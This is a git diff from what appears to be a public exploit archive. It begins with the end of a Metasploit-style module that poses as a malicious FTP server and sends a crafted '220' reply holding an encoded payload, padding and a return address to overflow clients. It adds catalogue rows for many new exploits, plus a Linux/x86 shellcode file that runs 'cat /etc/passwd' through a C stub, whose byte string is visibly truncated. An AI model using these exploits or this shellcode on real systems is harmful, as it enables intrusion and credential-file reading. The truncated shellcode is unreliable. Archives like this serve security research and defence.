+ client.put(welcome)
+
+ res = client.get_once.to_s.strip
+ print_status("#{client.peerhost} - Request: #{res}")
+ print_status("#{client.peerhost} - Response: sending 331 OK")
+ user = "331 OK.\r\n"
+ client.put(user)
+
+ res = client.get_once.to_s.strip
+ print_status("#{client.peerhost} - Request: #{res}")
+ print_status("#{client.peerhost} - Response: Sending 230 OK")
+ pass = "230 OK.\r\n"
+ client.put(pass)
+ res = client.get_once.to_s.strip
+ print_status("#{client.peerhost} - Request: #{res}")
+
+ sploit = '220 "'
+ sploit << payload.encoded
+ sploit << "\x20" * (payload_space - payload.encoded.length)
+ sploit << target.ret
+ sploit << "\" is current directory\r\n"
+
+ print_status("#{client.peerhost} - Request: Sending the malicious response")
+ client.put(sploit)
+
+ end
+end
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 128c1dd1b..1cc0eca04 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6008,6 +6008,9 @@ id,file,description,date,author,type,platform,port
44925,exploits/linux/dos/44925.txt,"QEMU Guest Agent 2.12.50 - Denial of Service",2018-06-22,"Fakhri Zulkifli",dos,linux,
44927,exploits/php/dos/44927.pl,"Opencart < 3.0.2.0 - Denial of Service",2018-06-22,"Todor Donev",dos,php,80
44934,exploits/hardware/dos/44934.txt,"DIGISOL DG-BR4000NG - Buffer Overflow (PoC)",2018-06-25,"Adipta Basu",dos,hardware,
+44958,exploits/windows/dos/44958.py,"Core FTP LE 2.2 - Buffer Overflow (PoC)",2018-07-02,"Berk Cem Göksel",dos,windows,21
+44962,exploits/linux/dos/44962.txt,"SIPp 3.6 - Local Buffer Overflow (PoC)",2018-07-02,"Fakhri Zulkifli",dos,linux,
+44965,exploits/hardware/dos/44965.py,"Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)",2018-07-02,t4rkd3vilz,dos,hardware,80
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9797,6 +9800,7 @@ id,file,description,date,author,type,platform,port
44904,exploits/linux/local/44904.py,"Redis-cli < 5.0 - Buffer Overflow (PoC)",2018-06-18,"Fakhri Zulkifli",local,linux,
44906,exploits/windows/local/44906.txt,"Microsoft COM for Windows - Privilege Escalation",2018-06-18,"Code White",local,windows,
44920,exploits/linux/local/44920.txt,"Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution",2018-06-21,"Paul Taylor",local,linux,
+44961,exploits/windows/local/44961.txt,"Enhanced Mitigation Experience Toolkit (EMET) - XML External Entity Injection",2018-07-02,hyp3rlinx,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16588,6 +16592,8 @@ id,file,description,date,author,type,platform,port
44890,exploits/linux/remote/44890.rb,"DHCP Client - Command Injection 'DynoRoot' (Metasploit)",2018-06-13,Metasploit,remote,linux,
44921,exploits/linux/remote/44921.txt,"Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution",2018-06-21,"Paul Taylor",remote,linux,22
44941,exploits/windows/remote/44941.txt,"Foxit Reader 9.0.1.1049 - Remote Code Execution",2018-06-25,mr_me,remote,windows,
+44968,exploits/windows/remote/44968.rb,"FTPShell client 6.70 (Enterprise edition) - Stack Buffer Overflow (Metasploit)",2018-07-02,Metasploit,remote,windows,
+44969,exploits/linux/remote/44969.rb,"Nagios XI 5.2.6-5.4.12 - Chained Remote Code Execution (Metasploit)",2018-07-02,Metasploit,remote,linux,80
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -38100,7 +38106,7 @@ id,file,description,date,author,type,platform,port
41346,exploits/php/webapps/41346.txt,"Joomla! Component JE Ticket System 1.2 - SQL Injection",2017-02-13,"Ihsan Sencan",webapps,php,
41347,exploits/php/webapps/41347.txt,"Joomla! Component JE Messanger - SQL Injection",2017-02-13,"Ihsan Sencan",webapps,php,
41359,exploits/php/webapps/41359.txt,"Itech B2B Script 4.29 - Multiple Vulnerabilities",2017-02-12,"Marc Castejon",webapps,php,
-41360,exploits/hardware/webapps/41360.rb,"Geutebruck 5.02024 G-Cam/EFD-2250 - Remote Command Execution (Metasploit)",2017-02-15,RandoriSec,webapps,hardware,
+41360,exploits/hardware/webapps/41360.rb,"Geutebruck 5.02024 G-Cam/EFD-2250 - 'testaction.cgi' Remote Command Execution (Metasploit)",2017-02-15,RandoriSec,webapps,hardware,
41361,exploits/hardware/webapps/41361.txt,"Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 - Multiple Vulnerabilities",2016-11-28,SlidingWindow,webapps,hardware,
41362,exploits/php/webapps/41362.txt,"Joomla! Component JoomBlog 1.3.1 - SQL Injection",2017-02-15,"Ihsan Sencan",webapps,php,
41368,exploits/php/webapps/41368.txt,"Joomla! Component JSP Store Locator 2.2 - 'id' SQL Injection",2017-02-15,"Ihsan Sencan",webapps,php,
@@ -39605,3 +39611,7 @@ id,file,description,date,author,type,platform,port
44954,exploits/php/webapps/44954.txt,"hycus CMS 1.0.4 - Authentication Bypass",2018-06-28,"Berk Dusunur",webapps,php,
44955,exploits/hardware/webapps/44955.txt,"DIGISOL DG-HR3400 Wireless Router - Cross-Site Scripting",2018-06-28,"Adipta Basu",webapps,hardware,80
44956,exploits/hardware/webapps/44956.py,"Cisco Adaptive Security Appliance - Path Traversal",2018-06-28,"Yassine Aboukir",webapps,hardware,
+44957,exploits/hardware/webapps/44957.rb,"Geutebruck 5.02024 G-Cam/EFD-2250 - 'simple_loglistjs.cgi' Remote Command Execution (Metasploit)",2018-07-02,RandoriSec,webapps,hardware,80
+44959,exploits/hardware/webapps/44959.py,"VMware NSX SD-WAN Edge < 3.1.2 - Command Injection",2018-07-02,ParagonSec,webapps,hardware,
+44960,exploits/php/webapps/44960.html,"DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin)",2018-07-02,bay0net,webapps,php,80
+44964,exploits/php/webapps/44964.txt,"Dolibarr ERP CRM < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index e20c0b60d..fcc18ea0f 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -892,3 +892,4 @@ id,file,description,date,author,type,platform
44808,shellcodes/linux_x86/44808.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (105 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86
44811,shellcodes/arm/44811.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (32 bytes)",2018-05-31,"Ken Kitahara",shellcode,arm
44856,shellcodes/arm/44856.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (60 bytes)",2018-06-08,rtmcx,shellcode,arm
+44963,shellcodes/linux_x86/44963.c,"Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes)",2018-07-02,"Anurag Srivastava",shellcode,linux_x86
diff --git a/shellcodes/linux_x86/44963.c b/shellcodes/linux_x86/44963.c
new file mode 100644
index 000000000..49280cf13
--- /dev/null
+++ b/shellcodes/linux_x86/44963.c
@@ -0,0 +1,41 @@
+/*
+# Linux/x86 - execve /bin/cat /etc//passwd shellcode (37 bytes)
+# Author: Anurag Srivastava
+# Tested on: i686 GNU/Linux
+# Shellcode Length: 37
+#Greetz - Manish Kishan Tanwar,Kishan Sharma,Vardan,Himanshu,Ravi and Spirited w0lf
+
+Disassembly of section .text:
+
+08048060 <_start>:
+ 8048060: 29 c9 sub ecx,ecx
+ 8048062: 51 push ecx
+ 8048063: 68 2f 63 61 74 push 0x7461632f
+ 8048068: 68 2f 62 69 6e push 0x6e69622f
+ 804806d: 89 e3 mov ebx,esp
+ 804806f: 51 push ecx
+ 8048070: 68 73 73 77 64 push 0x64777373
+ 8048075: 68 2f 2f 70 61 push 0x61702f2f
+ 804807a: 68 2f 65 74 63 push 0x6374652f
+ 804807f: 89 e1 mov ecx,esp
+ 8048081: 6a 0b push 0xb
+ 8048083: 58 pop eax
+ 8048084: 6a 00 push 0x0
+ 8048086: 51 push ecx
+ 8048087: 53 push ebx
+ 8048088: 89 e1 mov ecx,esp
+ 804808a: cd 80 int 0x80
+
+===============POC by Anurag Srivastava=========================
+*/
+
+#include
+#include
+unsigned char code[] = \
+"\x29\xc9\x51\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x51\x68\x73\x73\x77\x64\x68\x$
+main()
+{
+printf("Shellcode Length: %d\n", strlen(code));
+ int (*ret)() = (int(*)())code;
+ ret();
+}
\ No newline at end of file